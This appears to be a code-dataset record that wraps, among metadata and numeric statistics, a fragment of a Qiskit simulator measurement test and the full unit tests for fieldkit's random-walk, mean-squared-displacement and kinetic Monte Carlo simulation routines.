QasmSimulator measure with non-deterministic counts""" shots = 2000 qobj = ref_measure.measure_circuits_qobj_nondeterministic( allow_sampling=True) qobj.config.shots = shots circuits = [experiment.header.name for experiment in qobj.experiments] targets = ref_measure.measure_counts_qobj_nondeterministic(shots) result = self.SIMULATOR.run( qobj, backend_options=self.BACKEND_OPTS).result() self.is_completed(result) self.compare_counts(result, circuits, targets, delta=0.05 * shots) def test_measure_nondeterministic_multi_qubit_without_sampling(self): """Test QasmSimulator measure with non-deterministic counts""" shots = 2000 qobj = ref_measure.measure_circuits_qobj_nondeterministic( allow_sampling=False) qobj.config.shots = shots circuits = [experiment.header.name for experiment in qobj.experiments] targets = ref_measure.measure_counts_qobj_nondeterministic(shots) result = self.SIMULATOR.run( qobj, backend_options=self.BACKEND_OPTS).result() self.is_completed(result) self.compare_counts(result, circuits, targets, delta=0.05 * shots)
46.795455
95
0.677837
677
6,177
5.980798
0.163959
0.059274
0.067177
0.057298
0.836503
0.829094
0.822425
0.793776
0.754754
0.754754
0
0.011371
0.202687
6,177
131
96
47.152672
0.810761
0.228914
0
0.844444
0
0
0
0
0
0
0
0
0
1
0.088889
false
0
0.033333
0
0.155556
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
908ee2ac26023dac6aa93c281a873f9f20227ae6
29,230
py
Python
fieldkit/test/test_simulate.py
mphoward/fieldkit
c45e32129979f23ce0441109bc03e2cb5aad1411
[ "BSD-3-Clause" ]
null
null
null
fieldkit/test/test_simulate.py
mphoward/fieldkit
c45e32129979f23ce0441109bc03e2cb5aad1411
[ "BSD-3-Clause" ]
3
2020-04-25T21:39:48.000Z
2020-12-14T23:12:14.000Z
fieldkit/test/test_simulate.py
mphoward/fieldkit
c45e32129979f23ce0441109bc03e2cb5aad1411
[ "BSD-3-Clause" ]
1
2020-03-17T22:00:42.000Z
2020-03-17T22:00:42.000Z
""" Unit tests for fieldkit.simulate """ import unittest import numpy as np import fieldkit class RandomWalkTest(unittest.TestCase): """ Test cases for :py:class:`~fieldkit.simulate.random_walk` """ def test_one_step(self): """ Test simple random walk rules for one step. """ mesh = fieldkit.Mesh().from_lattice(N=3, lattice=fieldkit.HOOMDLattice(L=3.0)) field = fieldkit.Field(mesh).from_array(np.ones(mesh.shape)) field[:,:,0] = 0 domain = fieldkit.domain.digitize(field, threshold=0.5) traj,x,im = fieldkit.simulate.random_walk(domain, N=2, steps=1, runs=10, seed=42) # check shape of output is OK self.assertEqual(traj.shape, (10,2,3)) self.assertEqual(x.shape, (2,3)) self.assertEqual(im.shape, (2,3)) # check that all coords are still in box self.assertTrue(np.all(x >= 0)) self.assertTrue(np.all(x < 3)) # walk cannot enter z = 0 self.assertTrue(np.all(traj[:,:,2] != 0)) # with 10 steps, a particle cannot have traveled more than 3 images self.assertTrue(np.all(im >= -3)) self.assertTrue(np.all(im < 3)) # check that trajectory is continuous (no step is larger than 1) # 0->1 self.assertLessEqual(np.max(traj[1]-traj[0]), 1) self.assertGreaterEqual(np.min(traj[1]-traj[0]), -1) # 1->2 self.assertLessEqual(np.max(traj[2]-traj[1]), 1) self.assertGreaterEqual(np.min(traj[2]-traj[1]), -1) # 2->3 self.assertLessEqual(np.max(traj[3]-traj[2]), 1) self.assertGreaterEqual(np.min(traj[3]-traj[2]), -1) # try to restart from last state traj2,_,_ = fieldkit.simulate.random_walk(domain, N=2, steps=1, runs=1, coords=x, images=im, seed=24) # first frame should match old coordinates np.testing.assert_array_equal(traj2[0], x + im*mesh.shape) # difference between last old and first new should be 1 step at most self.assertLessEqual(np.max(traj2[0]-traj[-1]), 1) self.assertGreaterEqual(np.min(traj2[0]-traj[-1]), -1) def test_msd(self): """ Validate random walk with a short simulation, computing the MSD. The simulation is constructed so that the MSD = 1 for each component after 1 run. """ mesh = fieldkit.Mesh().from_lattice(N=10, lattice=fieldkit.HOOMDLattice(L=10.0)) field = fieldkit.Field(mesh).from_array(np.ones(mesh.shape)) domain = fieldkit.domain.digitize(field, threshold=0.5) # displacement should be consistent with random walk traj,_,_ = fieldkit.simulate.random_walk(domain, N=4000, steps=3, runs=1000, seed=42) window = 3 msd = np.zeros((window+1,3)) samples = np.zeros(window+1, dtype=np.int32) for i,ri in enumerate(traj[:-1]): for dt in range(1,min(window+1,traj.shape[0]-i)): rj = traj[i+dt] dr = rj-ri msd[dt] += np.mean(dr*dr,axis=0) samples[dt] += 1 flags = samples > 0 for ax in range(3): msd[flags,ax] /= samples[flags] np.testing.assert_array_almost_equal(msd[0], (0.,0.,0.), decimal=3) np.testing.assert_array_almost_equal(msd[1], (1.,1.,1.), decimal=3) np.testing.assert_array_almost_equal(msd[2], (2.,2.,2.), decimal=2) np.testing.assert_array_almost_equal(msd[3], (3.,3.,3.), decimal=2) # use compiled code to test farther out msd_2 = fieldkit.simulate.msd(traj,window=window) self.assertEqual(msd_2.shape, (window+1,3)) np.testing.assert_array_almost_equal(msd_2[0], (0.,0.,0.), decimal=3) np.testing.assert_array_almost_equal(msd_2[1], (1.,1.,1.), decimal=3) np.testing.assert_array_almost_equal(msd_2[2], (2.,2.,2.), decimal=2) np.testing.assert_array_almost_equal(msd_2[3], (3.,3.,3.), decimal=2) # both results should be essentially the same np.testing.assert_array_almost_equal(msd,msd_2) # use every 2nd origin with a looser tolerance due to lower stats msd_3 = fieldkit.simulate.msd(traj,window=window,every=2) self.assertEqual(msd_3.shape, (window+1,3)) np.testing.assert_array_almost_equal(msd_3[0], (0.,0.,0.), decimal=3) np.testing.assert_array_almost_equal(msd_3[1], (1.,1.,1.), decimal=2) np.testing.assert_array_almost_equal(msd_3[2], (2.,2.,2.), decimal=2) np.testing.assert_array_almost_equal(msd_3[3], (3.,3.,3.), decimal=2) def test_msd_binned(self): """ Test binned MSD compared to bulk MSD calculator. The simulation is constructed so that the MSD = 1 for each component after 1 run. """ # dummy trajectory traj = np.zeros((4,3,3)) traj[0,:] = [[0,0,0],[-1.9, 0, 0],[1.5,3,7]] traj[1,:] = [[0.1,2,-1],[-1.8,-1,3],[1.6,4,8]] traj[2,:] = [[0.2,4,-2],[-1.7,-2,6],[1.7,5,9]] traj[3,:] = [[0.3,6,-3],[-1.6,-3,9],[1.8,6,10]] # msd from binned msd_bin,edges = fieldkit.simulate.msd_binned(traj, window=1, axis=0, bins=8, range=(-2,2)) self.assertEqual(msd_bin.shape, (8,2,3)) self.assertEqual(edges.shape, (9,)) np.testing.assert_array_almost_equal(edges,(-2.,-1.5,-1.0,-0.5,0.,0.5,1.0,1.5,2.0)) # only bins 0, 4, and 7 have particles contributing np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.,0.),(1.e-2,1.,9.))) np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[2], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[3], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[4], ((0.,0.,0.),(1.e-2,4.,1.))) np.testing.assert_array_almost_equal(msd_bin[5], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[6], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[7], ((0.,0.,0.),(1.e-2,1.,1.))) # repeat using every other origin, should give identical result msd_bin,_ = fieldkit.simulate.msd_binned(traj, window=1, axis=0, bins=8, range=(-2,2), every=2) self.assertEqual(msd_bin.shape, (8,2,3)) np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.,0.),(1.e-2,1.,9.))) np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[2], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[3], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[4], ((0.,0.,0.),(1.e-2,4.,1.))) np.testing.assert_array_almost_equal(msd_bin[5], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[6], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[7], ((0.,0.,0.),(1.e-2,1.,1.))) # compute with a range that no particles lie in, should give all zeros msd_bin,_ = fieldkit.simulate.msd_binned(traj, window=1, axis=0, bins=1, range=(-1.5,-0.1)) self.assertEqual(msd_bin.shape, (1,2,3)) np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.,0.),(0.,0.,0.))) # repeat for the window that only the first particle lies in msd_bin,_ = fieldkit.simulate.msd_binned(traj, window=1, axis=0, bins=3, range=(0,0.6)) self.assertEqual(msd_bin.shape, (3,2,3)) np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.,0.),(1.e-2,4.,1.))) np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.,0.),(1.e-2,4.,1.))) np.testing.assert_array_almost_equal(msd_bin[2], ((0.,0.,0.),(0.,0.,0.))) # roll the trajectory so binning is done along y traj = np.roll(traj, shift=1, axis=2) msd_bin,_ = fieldkit.simulate.msd_binned(traj, window=1, axis=1, bins=8, range=(-2,2)) self.assertEqual(msd_bin.shape, (8,2,3)) np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.,0.),(9.,1.e-2,1.))) np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[2], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[3], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[4], ((0.,0.,0.),(1.,1.e-2,4.))) np.testing.assert_array_almost_equal(msd_bin[5], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[6], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[7], ((0.,0.,0.),(1.,1.e-2,1.))) # roll again so binning is done along z traj = np.roll(traj, shift=1, axis=2) msd_bin,_ = fieldkit.simulate.msd_binned(traj, window=1, axis=2, bins=8, range=(-2,2)) self.assertEqual(msd_bin.shape, (8,2,3)) np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.,0.),(1.,9.,1.e-2))) np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[2], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[3], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[4], ((0.,0.,0.),(4.,1.,1.e-2))) np.testing.assert_array_almost_equal(msd_bin[5], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[6], ((0.,0.,0.),(0.,0.,0.))) np.testing.assert_array_almost_equal(msd_bin[7], ((0.,0.,0.),(1.,1.,1.e-2))) def test_msd_survival(self): """ Test binned MSD compared to bulk MSD calculator. The simulation is constructed so that the MSD = 1 for each component after 1 run. """ # dummy trajectory traj = np.zeros((4,3,3)) traj[0,:] = [[0,0,0],[-1.9, 0, 0],[1.5,3,7]] traj[1,:] = [[0.1,2,-1],[-1.8,-1,3],[1.6,4,8]] traj[2,:] = [[0.2,4,-2],[-1.7,-2,6],[1.7,5,9]] traj[3,:] = [[0.3,6,-3],[-1.6,-3,9],[1.8,6,10]] # msd from binned msd_bin,counts,edges = fieldkit.simulate.msd_survival(traj, window=1, axis=0, bins=8, range=(-2,2)) self.assertEqual(msd_bin.shape, (8,2,2)) self.assertEqual(counts.shape, (8,2)) self.assertEqual(edges.shape, (9,)) np.testing.assert_array_almost_equal(edges,(-2.,-1.5,-1.0,-0.5,0.,0.5,1.0,1.5,2.0)) # check counts np.testing.assert_array_equal(counts[0], (3,3)) np.testing.assert_array_equal(counts[1], (0,0)) np.testing.assert_array_equal(counts[2], (0,0)) np.testing.assert_array_equal(counts[3], (0,0)) np.testing.assert_array_equal(counts[4], (3,3)) np.testing.assert_array_equal(counts[5], (0,0)) np.testing.assert_array_equal(counts[6], (0,0)) np.testing.assert_array_equal(counts[7], (3,3)) # only bins 0, 4, and 7 have particles contributing np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.),(1.,9.))) np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[2], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[3], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[4], ((0.,0.),(4.,1.))) np.testing.assert_array_almost_equal(msd_bin[5], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[6], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[7], ((0.,0.),(1.,1.))) # repeat using every other origin, should give identical result msd_bin,_,_ = fieldkit.simulate.msd_survival(traj, window=1, axis=0, bins=8, range=(-2,2), every=2) self.assertEqual(msd_bin.shape, (8,2,2)) np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.),(1.,9.))) np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[2], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[3], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[4], ((0.,0.),(4.,1.))) np.testing.assert_array_almost_equal(msd_bin[5], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[6], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[7], ((0.,0.),(1.,1.))) # compute with a range that no particles lie in, should give all zeros msd_bin,_,_ = fieldkit.simulate.msd_survival(traj, window=1, axis=0, bins=1, range=(-1.5,-0.1)) self.assertEqual(msd_bin.shape, (1,2,2)) np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.),(0.,0.))) # roll the trajectory so binning is done along y traj = np.roll(traj, shift=1, axis=2) msd_bin,_,_ = fieldkit.simulate.msd_survival(traj, window=1, axis=1, bins=8, range=(-2,2)) self.assertEqual(msd_bin.shape, (8,2,2)) np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.),(9.,1.))) np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[2], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[3], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[4], ((0.,0.),(1.,4.))) np.testing.assert_array_almost_equal(msd_bin[5], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[6], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[7], ((0.,0.),(1.,1.))) # roll again so binning is done along z traj = np.roll(traj, shift=1, axis=2) msd_bin,_,_ = fieldkit.simulate.msd_survival(traj, window=1, axis=2, bins=8, range=(-2,2)) self.assertEqual(msd_bin.shape, (8,2,2)) np.testing.assert_array_almost_equal(msd_bin[0], ((0.,0.),(1.,9.))) np.testing.assert_array_almost_equal(msd_bin[1], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[2], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[3], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[4], ((0.,0.),(4.,1.))) np.testing.assert_array_almost_equal(msd_bin[5], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[6], ((0.,0.),(0.,0.))) np.testing.assert_array_almost_equal(msd_bin[7], ((0.,0.),(1.,1.))) # TODO: test when a particle exits the bin def test_msd_survival_cylinder(self): """ Test radially binned MSD.""" # dummy radial and axial coordinates r = np.zeros((4,3)) r[0,:] = [0.0,1.5,2.5] r[1,:] = [0.3,1.3,2.5] r[2,:] = [0.6,1.1,2.5] r[3,:] = [0.9,1.01,2.5] # 0 has D = 1, 1 has D = 2, 2 has D = 3 z = np.zeros((4,3)) z[0,:] = [1,-2,0] z[1,:] = [2,-4,3] z[2,:] = [3,-6,6] z[3,:] = [4,-8,9] # msd from binned msd_bin,counts,edges = fieldkit.simulate.msd_survival_cylinder(r, z, window=1, bins=4, range=(0,4)) self.assertEqual(msd_bin.shape, (4,2)) self.assertEqual(counts.shape, (4,2)) self.assertEqual(edges.shape, (5,)) np.testing.assert_array_almost_equal(edges,(0,1,2,3,4)) # check counts np.testing.assert_array_equal(counts[0], (3,3)) np.testing.assert_array_equal(counts[1], (3,3)) np.testing.assert_array_equal(counts[2], (3,3)) np.testing.assert_array_equal(counts[3], (0,0)) # only bins 0, 1, and 2 have particles contributing np.testing.assert_array_almost_equal(msd_bin[0], (0,1)) np.testing.assert_array_almost_equal(msd_bin[1], (0,4)) np.testing.assert_array_almost_equal(msd_bin[2], (0,9)) np.testing.assert_array_almost_equal(msd_bin[3], (0,0)) # repeat using every other origin, should give identical result msd_bin,_,_ = fieldkit.simulate.msd_survival_cylinder(r, z, window=1, bins=4, range=(0,4), every=2) self.assertEqual(msd_bin.shape, (4,2)) np.testing.assert_array_almost_equal(msd_bin[0], (0,1)) np.testing.assert_array_almost_equal(msd_bin[1], (0,4)) np.testing.assert_array_almost_equal(msd_bin[2], (0,9)) np.testing.assert_array_almost_equal(msd_bin[3], (0,0)) # shring range to lose inner and outer particle msd_bin,_,_ = fieldkit.simulate.msd_survival_cylinder(r, z, window=1, bins=2, range=(1,3)) self.assertEqual(msd_bin.shape, (2,2)) np.testing.assert_array_almost_equal(msd_bin[0], (0,4)) np.testing.assert_array_almost_equal(msd_bin[1], (0,9)) class BiasedRandomWalkTest(unittest.TestCase): """ Test cases for :py:class:`~fieldkit.simulate.biased_walk` """ def test_one_step(self): """ Test biased random walk rules for one step, using unbiased rates. """ mesh = fieldkit.Mesh().from_lattice(N=3, lattice=fieldkit.HOOMDLattice(L=3.0)) field = fieldkit.Field(mesh).from_array(np.ones(mesh.shape)) field[:,:,0] = 0 domain = fieldkit.domain.digitize(field, threshold=0.5) # these are the hopping rates. # should really be zero to go in boundary, but this move will be rejected anyway. probs = np.full(list(mesh.shape) + [6], 1./6.) traj,x,im = fieldkit.simulate.biased_walk(domain, probs, N=2, steps=1, runs=10, seed=42) # check shape of output is OK self.assertEqual(traj.shape, (10,2,3)) self.assertEqual(x.shape, (2,3)) self.assertEqual(im.shape, (2,3)) # check that all coords are still in box self.assertTrue(np.all(x >= 0)) self.assertTrue(np.all(x < 3)) # walk cannot enter z = 0 self.assertTrue(np.all(traj[:,:,2] != 0)) # with 10 steps, a particle cannot have traveled more than 3 images self.assertTrue(np.all(im >= -3)) self.assertTrue(np.all(im < 3)) # check that trajectory is continuous (no step is larger than 1) # 0->1 self.assertLessEqual(np.max(traj[1]-traj[0]), 1) self.assertGreaterEqual(np.min(traj[1]-traj[0]), -1) # 1->2 self.assertLessEqual(np.max(traj[2]-traj[1]), 1) self.assertGreaterEqual(np.min(traj[2]-traj[1]), -1) # 2->3 self.assertLessEqual(np.max(traj[3]-traj[2]), 1) self.assertGreaterEqual(np.min(traj[3]-traj[2]), -1) # try to restart from last state traj2,_,_ = fieldkit.simulate.biased_walk(domain, probs, N=2, steps=1, runs=1, coords=x, images=im, seed=24) # first frame should match old coordinates np.testing.assert_array_equal(traj2[0], x + im*mesh.shape) # difference between last old and first new should be 1 step at most self.assertLessEqual(np.max(traj2[0]-traj[-1]), 1) self.assertGreaterEqual(np.min(traj2[0]-traj[-1]), -1) def test_msd(self): """ Validate biased random walk with a short simulation, computing the MSD. The simulation is constructed so that the MSD = 1 for each component after 1 run. """ mesh = fieldkit.Mesh().from_lattice(N=10, lattice=fieldkit.HOOMDLattice(L=10.0)) field = fieldkit.Field(mesh).from_array(np.ones(mesh.shape)) domain = fieldkit.domain.digitize(field, threshold=0.5) # these are the hopping rates, which we make a random walk for now probs = np.full(list(mesh.shape) + [6], 1./6.) # displacement should be consistent with random walk traj,_,_ = fieldkit.simulate.biased_walk(domain, probs, N=4000, steps=3, runs=1000, seed=42) window = 3 msd = np.zeros((window+1,3)) samples = np.zeros(window+1, dtype=np.int32) for i,ri in enumerate(traj[:-1]): for dt in range(1,min(window+1,traj.shape[0]-i)): rj = traj[i+dt] dr = rj-ri msd[dt] += np.mean(dr*dr,axis=0) samples[dt] += 1 flags = samples > 0 for ax in range(3): msd[flags,ax] /= samples[flags] np.testing.assert_array_almost_equal(msd[0], (0.,0.,0.), decimal=3) np.testing.assert_array_almost_equal(msd[1], (1.,1.,1.), decimal=3) np.testing.assert_array_almost_equal(msd[2], (2.,2.,2.), decimal=2) np.testing.assert_array_almost_equal(msd[3], (3.,3.,3.), decimal=2) # use compiled code to test farther out msd_2 = fieldkit.simulate.msd(traj,window=window) self.assertEqual(msd_2.shape, (window+1,3)) np.testing.assert_array_almost_equal(msd_2[0], (0.,0.,0.), decimal=3) np.testing.assert_array_almost_equal(msd_2[1], (1.,1.,1.), decimal=3) np.testing.assert_array_almost_equal(msd_2[2], (2.,2.,2.), decimal=2) np.testing.assert_array_almost_equal(msd_2[3], (3.,3.,3.), decimal=2) # both results should be essentially the same np.testing.assert_array_almost_equal(msd,msd_2) # use every 2nd origin with a looser tolerance due to lower stats msd_3 = fieldkit.simulate.msd(traj,window=window,every=2) self.assertEqual(msd_3.shape, (window+1,3)) np.testing.assert_array_almost_equal(msd_3[0], (0.,0.,0.), decimal=3) np.testing.assert_array_almost_equal(msd_3[1], (1.,1.,1.), decimal=2) np.testing.assert_array_almost_equal(msd_3[2], (2.,2.,2.), decimal=2) np.testing.assert_array_almost_equal(msd_3[3], (3.,3.,3.), decimal=2) class kmcTest(unittest.TestCase): """ Test cases for :py:class:`~fieldkit.simulate.kmc`""" def test_basic(self): """ Test basic biased random walk rules, using unbiased rates.""" mesh = fieldkit.Mesh().from_lattice(N=3, lattice=fieldkit.HOOMDLattice(L=3.0)) field = fieldkit.Field(mesh).from_array(np.ones(mesh.shape)) field[:,:,0] = 0 domain = fieldkit.domain.digitize(field, threshold=0.5) # these are the hopping rates. # should really be zero to go in boundary, but this move will be rejected anyway. rates = np.full(list(mesh.shape) + [6], 1.) traj,x,im,t = fieldkit.simulate.kmc(domain, rates, np.arange(10), N=2, steps=100, seed=42) # check shape of output is OK self.assertEqual(traj.shape, (10,2,3)) self.assertEqual(x.shape, (2,3)) self.assertEqual(im.shape, (2,3)) self.assertEqual(t.shape, (2,)) # check that all coords are still in box self.assertTrue(np.all(x >= 0)) self.assertTrue(np.all(x < 3)) # walk cannot enter z = 0 self.assertTrue(np.all(traj[:,:,2] != 0)) # with 10 steps, a particle cannot have traveled more than 3 images self.assertTrue(np.all(im >= -3)) self.assertTrue(np.all(im < 3)) def test_msd(self): """ Validate biased random walk with a short simulation, computing the MSD. This MSD is a little different than the usual random walk because the MSD tends to 1.0 at t->0, rather than 0.0, because any hop (even after a short time) moves the walker by one lattice site. """ mesh = fieldkit.Mesh().from_lattice(N=10, lattice=fieldkit.HOOMDLattice(L=10.0)) field = fieldkit.Field(mesh).from_array(np.ones(mesh.shape)) domain = fieldkit.domain.digitize(field, threshold=0.5) # displacement should be consistent with random walk with coeff. 1/2 rates = np.full(list(mesh.shape) + [6], 0.5) traj,_,_,_ = fieldkit.simulate.kmc(domain, rates, np.arange(2000), N=4000, steps=10000, seed=42) window = 3 msd = fieldkit.simulate.msd(traj,window=window) self.assertEqual(msd.shape, (window+1,3)) np.testing.assert_array_almost_equal(msd[0], (0.,0.,0.), decimal=3) np.testing.assert_array_almost_equal(msd[1], (1.,1.,1.), decimal=3) np.testing.assert_array_almost_equal(msd[2], (2.,2.,2.), decimal=2) np.testing.assert_array_almost_equal(msd[3], (3.,3.,3.), decimal=2) def test_rates(self): """Test hopping rate calculator.""" mesh = fieldkit.Mesh().from_lattice(N=12, lattice=fieldkit.HOOMDLattice(L=12.0)) ## bias D in z flags = np.logical_or(mesh.grid[...,2] < 1.0, mesh.grid[...,2] > 10) D = fieldkit.Field(mesh).from_array(0.1*(11.0-mesh.grid[...,2])) D[flags] = 0. rho = fieldkit.Field(mesh).from_array(np.ones(mesh.shape)) rho[flags] = 0. domain = fieldkit.domain.digitize(rho, threshold=1.e-6) # check rates by hand for simple case rates = fieldkit.simulate.compute_hopping_rates(domain, D, rho) self.assertEqual(rates.shape, (12,12,12,6)) np.testing.assert_array_almost_equal(rates[0,0,0], (0.,0.,0.,0.,0.,0.)) np.testing.assert_array_almost_equal(rates[0,0,1], (1.,1.,1.,1.,0.95,0.)) np.testing.assert_array_almost_equal(rates[0,0,2], (0.9,0.9,0.9,0.9,0.85,0.95)) # ... np.testing.assert_array_almost_equal(rates[0,0,9], (0.2,0.2,0.2,0.2,0.15,0.25)) np.testing.assert_array_almost_equal(rates[0,0,10], (0.1,0.1,0.1,0.1,0.,0.15)) np.testing.assert_array_almost_equal(rates[0,0,11], (0.,0.,0.,0.,0.,0.)) np.testing.assert_array_almost_equal(rates[0,0], rates[1,0]) np.testing.assert_array_almost_equal(rates[0,0], rates[0,1]) # run short simulation to verify density distribution traj,_,_,_ = fieldkit.simulate.kmc(domain, rates, 100+np.arange(500), N=1000, steps=10000, seed=42) self.assertEqual(np.min(traj[...,2]), 1) self.assertEqual(np.max(traj[...,2]), 10) hist,_ = np.histogram(traj[...,2], range=(0.5,10.5), bins=10, density=True) np.testing.assert_array_almost_equal(hist, 0.1, decimal=2) ## also bias the density in z rho.field = 0.1*(mesh.grid[...,2]) rho[flags] = 0. domain = fieldkit.domain.digitize(rho, threshold=1.e-6) rates = fieldkit.simulate.compute_hopping_rates(domain, D, rho) np.testing.assert_array_almost_equal(rates[0,0,0,0:4], 0.) np.testing.assert_array_almost_equal(rates[0,0,1,0:4], 1.) np.testing.assert_array_almost_equal(rates[0,0,10,0:4], 0.1) np.testing.assert_array_almost_equal(rates[0,0,11,0:4], 0.) np.testing.assert_array_almost_equal(rates[0,0], rates[1,0]) np.testing.assert_array_almost_equal(rates[0,0], rates[0,1]) traj,_,_,_ = fieldkit.simulate.kmc(domain, rates, 100+np.arange(500), N=1000, steps=10000, seed=42) self.assertEqual(np.min(traj[...,2]), 1) self.assertEqual(np.max(traj[...,2]), 10) hist,_ = np.histogram(traj[...,2], range=(0.5,10.5), bins=10, density=True) np.testing.assert_array_almost_equal(hist, rho.field[0,0,1:-1]/np.sum(rho.field[0,0,1:-1]), decimal=2) ## roll axis to y D.field = np.moveaxis(D.field,2,1) rho.field = np.moveaxis(rho.field,2,1) domain = fieldkit.domain.digitize(rho, threshold=1.e-6) rates = fieldkit.simulate.compute_hopping_rates(domain, D, rho) np.testing.assert_array_almost_equal(rates[0,0,0,0:2], 0.) np.testing.assert_array_almost_equal(rates[0,0,0,4:6], 0.) np.testing.assert_array_almost_equal(rates[0,1,0,0:2], 1.) np.testing.assert_array_almost_equal(rates[0,1,0,4:6], 1.) np.testing.assert_array_almost_equal(rates[0,10,0,0:2], 0.1) np.testing.assert_array_almost_equal(rates[0,10,0,4:6], 0.1) np.testing.assert_array_almost_equal(rates[0,11,0,0:2], 0.) np.testing.assert_array_almost_equal(rates[0,11,0,4:6], 0.) np.testing.assert_array_almost_equal(rates[0,:,0], rates[1,:,0]) np.testing.assert_array_almost_equal(rates[0,:,0], rates[0,:,1]) traj,_,_,_ = fieldkit.simulate.kmc(domain, rates, 100+np.arange(500), N=1000, steps=10000, seed=42) self.assertEqual(np.min(traj[...,1]), 1) self.assertEqual(np.max(traj[...,1]), 10) hist,_ = np.histogram(traj[...,1], range=(0.5,10.5), bins=10, density=True) np.testing.assert_array_almost_equal(hist, rho.field[0,1:-1,0]/np.sum(rho.field[0,1:-1,0]), decimal=2) ## roll axis to z D.field = np.moveaxis(D.field,1,0) rho.field = np.moveaxis(rho.field,1,0) domain = fieldkit.domain.digitize(rho, threshold=1.e-6) rates = fieldkit.simulate.compute_hopping_rates(domain, D, rho) np.testing.assert_array_almost_equal(rates[0,0,0,2:6], 0.) np.testing.assert_array_almost_equal(rates[1,0,0,2:6], 1.) np.testing.assert_array_almost_equal(rates[10,0,0,2:6], 0.1) np.testing.assert_array_almost_equal(rates[11,0,0,2:6], 0.) np.testing.assert_array_almost_equal(rates[:,0,0], rates[:,1,0]) np.testing.assert_array_almost_equal(rates[:,0,0], rates[:,0,1]) traj,_,_,_ = fieldkit.simulate.kmc(domain, rates, 100+np.arange(500), N=1000, steps=10000, seed=42) self.assertEqual(np.min(traj[...,0]), 1) self.assertEqual(np.max(traj[...,0]), 10) hist,_ = np.histogram(traj[...,0], range=(0.5,10.5), bins=10, density=True) np.testing.assert_array_almost_equal(hist, rho.field[1:-1,0,0]/np.sum(rho.field[1:-1,0,0]), decimal=2)
51.461268
116
0.614232
4,812
29,230
3.583957
0.057564
0.03769
0.033225
0.18555
0.932796
0.915111
0.898237
0.878986
0.866462
0.837528
0
0.073767
0.199521
29,230
567
117
51.552028
0.663305
0.139104
0
0.670185
0
0
0
0
0
0
0
0.001764
0.617414
1
0.026385
false
0
0.007916
0
0.042216
0
0
0
0
null
0
0
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
0
0
0
0
0
0
0
0
0
8
90de5855392a7a0246dd03346befb0707c52b316
367,673
py
Python
laygo/generators/logic/logic_templates_layout_generator.py
tinapiao/Software-IC-Automation
74b23cd94aa6e4658b110e93b5deb635e014f3a6
[ "BSD-3-Clause" ]
26
2017-07-07T08:06:31.000Z
2021-11-25T06:41:24.000Z
laygo/generators/logic/logic_templates_layout_generator.py
tinapiao/Software-IC-Automation
